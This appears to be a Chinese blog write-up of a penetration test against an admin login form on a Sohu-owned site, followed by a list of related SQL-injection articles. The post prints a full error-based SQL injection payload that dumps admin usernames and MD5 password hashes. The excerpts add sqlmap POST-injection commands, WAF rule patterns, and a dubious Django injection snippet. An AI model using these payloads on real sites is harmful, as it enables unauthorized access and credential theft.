后台登陆框post注入

最新推荐文章于 2024-08-15 14:38:44 发布
最新推荐文章于 2024-08-15 14:38:44 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: hacking 文章标签: 服务器 web unix nginx 破解 加密

作者:knife

目录
0×00 踩点
0×01 寻找漏洞
0×02 利用漏洞
0×03 完结

0×00 踩点

再一次授权情况下 ,本人对骚狐 旗下某个站点发起了一次 友情的渗透

在不知道任何信息的情况下,本人先对骚狐的一些基本服务器信息做了了解

情况如下

服务器是:unix 系统

web版本:nginx/0.7.69

ip:xxx.xxx.xxx.xxx 用了反向代理

0×01 寻找漏洞

对于服务器 我暂时没有什么漏洞可以提权

web 版本 基于 nginx 早期 80sec 发过两个 解析漏洞

这里我们可以看下 当然这么大的一只狐狸怎么会干出这种傻事呢???

所以试过之后还是得出结论 木有漏洞

那么我开始找其他漏洞 发现一个后台登陆 post 提交 注入 漏洞

而且是报错的 这里我给大家发图

在用户名那里输入了 admin ‘

报错了

如图1

我们可以得出以下几个信息

表:manage

字段:manage_name 和 manage_pwd

0×02 利用漏洞

在知道web存在漏洞的情况下 我们得利用漏洞

既然可以注入

我们就开始报错注入吧 我们可以使用 火狐的 live http headers 插件 来抓包

因为登陆框限制了字符长度 虽然我们可以修改字符长度 但是有点脱了裤子放屁的味道

那么我们开始抓包 post 提交 username password

当然 password 不可为空

我们可以这样构造了。。

username=admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x7e,manage_pwd,0x7e,manage_name,count(*),0×27,0x7e) from manage limit 0,1))a from information_schema.tables group by a)b#&password=dir

以为前提 我们知道了 表 和 字段 所以咱们不用一步一步的 去注入 可以直接爆出来

其次 我进行了更深一步的注入 权限很低

如图2


我们爆出来 账号 和密码 密码由 md5 加密 我们拿去破解

这一次的渗透基本完结了
0×03 完结

在得到账号和密码之后 我们可以进入后台

如图3

 

因骚狐要求 所以我就不暴露敏感信息了

本次渗透免费 欢迎下次光顾

文章简陋 无伤大雅


「已注销」
关注
专栏目录
【漏洞挖掘】——105、POST注入深入剖析
Fly_鹏程万里
06-21 76
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入
POST注入和HEAD注入
weixin_53026460的博客
09-27 1525
(一)POST注入和普通的注入(联合查询)是没有区别的,它只是根据传参方式不同来判断类型。(二)POST注入的核心在于,有就可以尝试下是否存在注入;(三)GET可以直接传递参数,POST更多是存在于,因为代表着交互点,像登录、查询等各种一般都是通过POST进行传参的,当然这句话也不是必然,我们举一个baidu的例子;像这样在URL栏可以看到的是GET传参;各种,一般来说都是POST传参,但不绝对,比如上面的baidu首页的例子就不是POST传参;
利用SQL注入漏洞登录后台
03-27
通过介绍SQL Injection的基本原理,讲解如何防范SQL Injection。通过一些程序源码对SQL的攻击进行了细致分析,使我们对SQL Injection机理有了一个深入认识,作为一名Web应用开发人员,一定不要盲目相信用户的输入,而要对用户输入的数据进行严格的校验处理,否则的话,SQL Injection将会不期而至。
POST登陆注入
security.blog.cndn.net
03-07 493
1.burpsuite + sqlmap 利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度) 注入点:http://www.xx.com/Login.asp sqlmap.py -r test.txt -p Password 2.自动注册表单,截取数据。(直接在后面加[–forms]) sqlmap -u “http://ww...
记一次实战中sql注入——一个登录怎么测试?
最新发布
A19911511842的博客
08-15 370
利用user()获取当前用户,因为我不知道具体是哪个字符,所以只有加个感叹号才能说明这个语句为真,才会返回5,所以这次也是隔了五秒,raw才显示出来。在sleep()函数里面加一个if语句,就是说1=1那个表达式中,如果为真就返回5,否则就返回0。所以我直接用ascii()函数将user()转换成ascii码进行爆破。在登录页面的账户输入admin’密码随便输,返回如下图。但是我输入admin’’ 密码随便,返回的又不一样。经过测验,发现121才会睡5秒,122没有睡。这一次也是停了5秒才显示出来的。
后台登陆post注入实战
weixin_34270606的博客
11-24 273
后台登陆post注入按照注入的方式属于post,和前台搜索型post注入、文本注入类似,由于目前主流的注入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说明一下大家不大在意的post注入的手注方法。(以后也会补充一个cookie注入的实战例子) http://xxx.co...
登录注入笔记
weixin_34233421的博客
11-28 373
2019独角兽企业重金招聘Python工程师标准>>> ...
mysql 登录注入_sqlmap之(六)----POST登陆注入实战
weixin_30698775的博客
01-19 683
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
post 未经授权_意大利后台登录POST注入实战
weixin_39673002的博客
12-03 402
0x01 前言这篇文章记录的是当时利用SQLMAP和手工方式对某“意大利网站后台登录POST注入”的过程,POST注入漏洞一般存在于网站搜索查询、前/后台登录等功能。以前也一直想写一篇关于POST注入的文章,可惜一直没找到用于演示的网站,朋友@冷空气给我发了一个,感谢!0x02 Sqlmap注入后台登陆打开目标网站后台,登录帐号文本中输入个'单引号来简单判断是存在SQL注入漏洞...
利用SQL注入漏洞登录后台的实现方法
12-15
以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的步骤主要包括寻找注入点、构造SQL语句、发送到数据库、执行并获取结果。攻击者通常会在用户输入字段中插入额外的SQL...
mysql 登录注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2550
SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
mysql 登录注入_登陆界面的SQL注入
weixin_42245967的博客
02-18 2769
首先登陆的sql通常分为两种类型1234567(1)先匹配username(注册时也类似这种方法验重)$query = mysql_query("SELECT * FROM interest WHERE uname = '{$_POST['uname']}");$key = mysql_fetch_array($query);if($key['pwd'] == $_POST['pwd']) {.....
DC-1 登录的sql注入
a_153161的博客
12-04 1183
DC-1登录的报错注入
分享一个php的防火墙,拦截SQL注入和xss
hetangyuese321的博客
09-22 564
这个是一个一个基于php的防火墙程序,拦截sql注入和xss攻击,无需服务器支持 安装 composer require xielei/waf 使用说明 $waf = new \Xielei\Waf\Waf(); $waf->run(); 自定义拦截规则 $rules = [ '\.\./', //禁用包含 ../ 的参数 '\<\?', //禁止php脚本出现 '\s*or\s+.*=.*', //匹配' or 1=1 ,防止sql注入 'select([
某站登入存在post注入
椰树ii
09-29 2033
验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/70976527然后用sqlmap跑包。命令为:sqlmap -r “包的地址”如图,成功注入。是sa权限,而且可以直接仔细--os-shell命令,离内网已经很近了。...
一个简单的登录实现和预防sql注入
weixin_47391907的博客
10-28 183
添加了addcslashes()函数过滤的情况,用以下playload:原理是目标系统利用“”号来拼接输入变量,但是“”号可以解析$str这个变量。如图:目标源码使用addcslashes()函数过滤$_str ,再用“”号闭合赋值给$str,最终再传入eval()函数。对比可以看到:只要是’‘ 或者“”包裹的正常php代码,无论添加多少层{ }号闭合php代码语句,都可以顺利执行。注:这段php测试代码说明了利用addcslashes()去过滤eval()函数的输入,可以利用${}来进行绕过。
HTB_Appointment 靶机之登录万能密码、sqlmap post 注入
网络安全学习
04-22 4108
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
三种后台登入注入
eldn__的专栏
04-18 8239
http://www.2cto.com/Article/201111/110527.html 以下是小菜新得 各位看管莫笑 老牛 飘过------ 废话不多说 开始 第一种注入 后台dbo 权限拿websehll 目标网站:http://bhst.edu.cn/manage/login.aspx 判断有无注入 输入” a’” 返回错误页面— 爆字
django后台管理系统注入复现
05-25
首先,Django的后台管理系统是一个非常常用的功能,但在使用时需要注意安全问题。注入漏洞是一种常见的攻击方式,攻击者可以通过注入恶意代码来获取敏感数据或执行恶意操作。 以下是一个简单的Django注入漏洞复现步骤: 1. 打开Django后台管理页面并登录。 2. 在浏览器中打开开发者工具,切换到控制台。 3. 执行以下代码: ``` var xhr = new XMLHttpRequest(); xhr.open("POST", "/admin/auth/user/"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send("csrfmiddlewaretoken=" + document.getElementsByName("csrfmiddlewaretoken")[0].value + "&username=admin';--&password=123456"); ``` 这段代码发送了一个POST请求到Django后台管理页面的登录接口,并注入了一个恶意的用户名,密码则随便填写。其中,`--`是SQL语句注释符号,可以将后面的代码注释掉,以避免出现语法错误。 4. 在控制台中查看响应结果,如果响应中包含类似于`SELECT * FROM auth_user WHERE username='admin';--' AND password='...'`的SQL语句,则说明注入成功。 5. 使用注入的用户名和任意密码登录后台管理系统,攻击者就可以获取敏感数据或执行恶意操作。 需要注意的是,以上漏洞复现仅供学习和研究使用,请勿用于非法用途。在实际应用中,应该采取一系列措施来保护Django应用的安全,例如过滤用户输入、使用ORM架等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值